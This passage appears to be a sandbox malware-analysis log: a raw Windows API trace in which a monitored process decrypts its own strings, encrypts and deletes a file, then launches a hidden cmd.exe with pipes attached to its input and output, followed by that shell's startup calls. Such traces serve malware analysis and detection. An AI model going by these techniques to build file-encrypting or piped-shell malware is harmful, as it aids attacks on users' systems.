pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0206.221] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0206.221] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0206.221] CryptDestroyKey (hKey=0xa32a28) returned 1 [0206.221] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0206.221] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.221] CloseHandle (hObject=0x100) returned 1 [0206.221] CloseHandle (hObject=0x124) returned 1 [0206.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini")) returned 1 [0206.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fce0 | out: phKey=0x2f4fce0*=0xa32928) returned 1 [0206.222] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fcc8, dwFlags=0x0) returned 1 [0206.222] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x2f4fc94 | out: pbData=0x20f16c0, pdwDataLen=0x2f4fc94) returned 1 [0206.222] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.222] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0206.222] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0206.222] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0206.222] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 Thread: id = 211 os_tid = 0x29c Thread: id = 213 os_tid = 0x46c Thread: id = 214 os_tid = 0x420 Thread: id = 215 os_tid = 0x6ec Thread: id = 218 os_tid = 0x5ac Thread: id = 220 os_tid = 0x768 Thread: id = 221 os_tid = 0x52c Thread: id = 227 os_tid = 0x318 [0222.392] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0222.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x364f6bc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x364f724 | out: phKey=0x364f724*=0xa32b28) returned 1 [0222.392] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x364f70c, dwFlags=0x0) returned 1 [0222.392] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x364f6d8 | out: pbData=0x20fd9b0, pdwDataLen=0x364f6d8) returned 1 [0222.392] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.392] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f14a0 [0222.392] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x14) returned 0x20f5910 [0222.392] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0222.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x364f694, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x364f6fc | out: phKey=0x364f6fc*=0xa32b28) returned 1 [0222.392] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x364f6e4, dwFlags=0x0) returned 1 [0222.392] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x364f6b0 | out: pbData=0x20f5498, pdwDataLen=0x364f6b0) returned 1 [0222.392] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.392] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.393] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f14a0, nSize=0xa | out: lpDst="") returned 0x1c [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0222.393] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f14a0, Size=0x26) returned 0x20f14a0 [0222.393] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x26) returned 0x20f5910 [0222.393] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0222.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x364f690, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x364f6f8 | out: phKey=0x364f6f8*=0xa32b28) returned 1 [0222.393] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x364f6e0, dwFlags=0x0) returned 1 [0222.393] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x364f6ac | out: pbData=0x20f5498, pdwDataLen=0x364f6ac) returned 1 [0222.393] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.393] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f14a0, nSize=0x13 | out: lpDst="") returned 0x1c [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0222.393] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f14a0, Size=0x4a) returned 0x20f16c0 [0222.393] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4a) returned 0x20f1600 [0222.393] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0222.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x364f690, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x364f6f8 | out: phKey=0x364f6f8*=0xa32b28) returned 1 [0222.393] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x364f6e0, dwFlags=0x0) returned 1 [0222.393] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x364f6ac | out: pbData=0x20f5498, pdwDataLen=0x364f6ac) returned 1 [0222.393] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.393] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x20f16c0, nSize=0x25 | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0222.393] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0222.393] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x20f1600 [0222.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x364f6b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x364f71c | out: phKey=0x364f71c*=0xa32b28) returned 1 [0222.393] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x364f704, dwFlags=0x0) returned 1 [0222.394] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1600, pdwDataLen=0x364f6d0 | out: pbData=0x20f1600, pdwDataLen=0x364f6d0) returned 1 [0222.394] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.394] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0222.394] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0222.394] Wow64DisableWow64FsRedirection (in: OldValue=0x364f7d4 | out: OldValue=0x364f7d4*=0x0) returned 1 [0222.394] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0222.394] CreatePipe (in: hReadPipe=0x364f7e0, hWritePipe=0x364f7e4, lpPipeAttributes=0x364f7bc, nSize=0x0 | out: hReadPipe=0x364f7e0*=0x154, hWritePipe=0x364f7e4*=0x1f4) returned 1 [0222.394] CreatePipe (in: hReadPipe=0x364f7dc, hWritePipe=0x364f7d8, lpPipeAttributes=0x364f7bc, nSize=0x0 | out: hReadPipe=0x364f7dc*=0xec, hWritePipe=0x364f7d8*=0x1b0) returned 1 [0222.394] SetHandleInformation (hObject=0x1f4, dwMask=0x1, dwFlags=0x0) returned 1 [0222.394] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0222.394] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x364f768*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x1b0, hStdError=0x1b0), lpProcessInformation=0x364f7ac | out: lpCommandLine=0x0, lpProcessInformation=0x364f7ac*(hProcess=0x1f8, hThread=0x1bc, dwProcessId=0x538, dwThreadId=0x5dc)) returned 1 [0222.399] WriteFile (in: hFile=0x1f4, lpBuffer=0x2227790*, nNumberOfBytesToWrite=0xbc, lpNumberOfBytesWritten=0x364f7c8, lpOverlapped=0x0 | out: lpBuffer=0x2227790*, lpNumberOfBytesWritten=0x364f7c8*=0xbc, lpOverlapped=0x0) returned 1 [0222.399] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0xffffffff) Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1648c000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x5e8" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x27c [0124.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbf0 | out: lpSystemTimeAsFileTime=0x20fbf0*(dwLowDateTime=0x511a9f70, dwHighDateTime=0x1d4f12b)) [0124.307] GetCurrentProcessId () returned 0x69c [0124.307] GetCurrentThreadId () returned 0x27c [0124.307] GetTickCount () returned 0xabf7 [0124.307] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbf8 | out: lpPerformanceCount=0x20fbf8*=8863272840) returned 1 [0124.308] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab10000 [0124.308] __set_app_type (_Type=0x1) [0124.309] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab37810) returned 0x0 [0124.309] __getmainargs (in: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610, _DoWildCard=0, _StartInfo=0x4ab3e0f4 | out: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610) returned 0 [0124.310] GetCurrentThreadId () returned 0x27c [0124.310] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x27c) returned 0x3c [0124.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000 [0124.311] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b26d40 [0124.311] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.311] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.311] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb88 | out: phkResult=0x20fb88*=0x0) returned 0x2 [0124.311] VirtualQuery (in: lpAddress=0x20fb70, lpBuffer=0x20faf0, dwLength=0x30 | out: lpBuffer=0x20faf0*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.311] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20faf0, dwLength=0x30 | out: lpBuffer=0x20faf0*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.311] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20faf0, dwLength=0x30 | out: lpBuffer=0x20faf0*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.311] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20faf0, dwLength=0x30 | out: lpBuffer=0x20faf0*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.311] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20faf0, dwLength=0x30 | out: lpBuffer=0x20faf0*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0124.311] GetConsoleOutputCP () returned 0x1b5 [0124.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.314] SetConsoleCtrlHandler (HandlerRoutine=0x4ab33184, Add=1) returned 1 [0124.314] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.314] SetConsoleMode (hConsoleHandle=0xb8, dwMode=0x0) returned 0 [0124.314] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.314] GetConsoleMode (in: hConsoleHandle=0xb8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0124.314] _get_osfhandle (_FileHandle=0) returned 0xac [0124.314] GetConsoleMode (in: hConsoleHandle=0xac, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0124.315] GetEnvironmentStringsW () returned 0x2f8a60* [0124.315] GetProcessHeap () returned 0x2e0000 [0124.315] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f94f0 [0124.315] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.315] GetProcessHeap () returned 0x2e0000 [0124.315] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x8) returned 0x2f88e0 [0124.315] GetEnvironmentStringsW () returned 0x2f8a60* [0124.315] GetProcessHeap () returned 0x2e0000 [0124.315] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f9f80 [0124.315] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.315] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea48 | out: phkResult=0x20ea48*=0x44) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x18, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x1, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x1, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x0, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x40, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x40, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x40, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegCloseKey (hKey=0x44) returned 0x0 [0124.316] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea48 | out: phkResult=0x20ea48*=0x44) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x40, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x1, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x1, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x0, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x9, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x4, lpData=0x20ea60*=0x9, lpcbData=0x20ea44*=0x4) returned 0x0 [0124.316] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea40, lpData=0x20ea60, lpcbData=0x20ea44*=0x1000 | out: lpType=0x20ea40*=0x0, lpData=0x20ea60*=0x9, lpcbData=0x20ea44*=0x1000) returned 0x2 [0124.316] RegCloseKey (hKey=0x44) returned 0x0 [0124.317] time (in: timer=0x0 | out: timer=0x0) returned 0x5cb08490 [0124.317] srand (_Seed=0x5cb08490) [0124.317] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0124.317] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0124.363] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.363] GetProcessHeap () returned 0x2e0000 [0124.363] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0124.363] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2faa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0124.363] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.363] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.363] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.364] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0124.364] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0124.364] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0124.364] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0124.364] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0124.364] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0124.364] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0124.364] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0124.364] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0124.364] GetProcessHeap () returned 0x2e0000 [0124.364] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f94f0 | out: hHeap=0x2e0000) returned 1 [0124.364] GetEnvironmentStringsW () returned 0x2f8a60* [0124.364] GetProcessHeap () returned 0x2e0000 [0124.364] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa94) returned 0x2fac30 [0124.364] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.364] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.364] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.364] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.364] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.364] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.364] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.364] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.364] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.364] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.364] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.365] GetProcessHeap () returned 0x2e0000 [0124.365] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x38) returned 0x2f6490 [0124.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f850 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x20f850, lpFilePart=0x20f830 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f830*="system32") returned 0x13 [0124.365] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0124.365] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x20f560 | out: lpFindFileData=0x20f560) returned 0x2fb6d0 [0124.365] FindClose (in: hFindFile=0x2fb6d0 | out: hFindFile=0x2fb6d0) returned 1 [0124.365] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x20f560 | out: lpFindFileData=0x20f560) returned 0x2fb6d0 [0124.365] FindClose (in: hFindFile=0x2fb6d0 | out: hFindFile=0x2fb6d0) returned 1 [0124.365] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0124.365] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0124.365] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0124.365] GetProcessHeap () returned 0x2e0000 [0124.365] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fac30 | out: hHeap=0x2e0000) returned 1 [0124.365] GetEnvironmentStringsW () returned 0x2fac30* [0124.365] GetProcessHeap () returned 0x2e0000 [0124.365] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xac4) returned 0x2f8a60 [0124.366] FreeEnvironmentStringsW (penv=0x2fac30) returned 1 [0124.366] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.366] GetProcessHeap () returned 0x2e0000 [0124.366] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f6490 | out: hHeap=0x2e0000) returned 1 [0124.366] GetProcessHeap () returned 0x2e0000 [0124.366] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4016) returned 0x2fac30 [0124.366] GetProcessHeap () returned 0x2e0000 [0124.366] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fac30 | out: hHeap=0x2e0000) returned 1 [0124.366] GetConsoleOutputCP () returned 0x1b5 [0124.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.366] GetUserDefaultLCID () returned 0x409 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab47b50, cchData=8 | out: lpLCData=":") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f960, cchData=128 | out: lpLCData="0") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f960, cchData=128 | out: lpLCData="0") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f960, cchData=128 | out: lpLCData="1") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab5a740, cchData=8 | out: lpLCData="/") returned 2 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab5a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab5a460, cchData=32 | out: lpLCData="Tue") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab5a420, cchData=32 | out: lpLCData="Wed") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab5a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab5a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0124.367] GetLocaleInfoW (in: Locale=0x409, 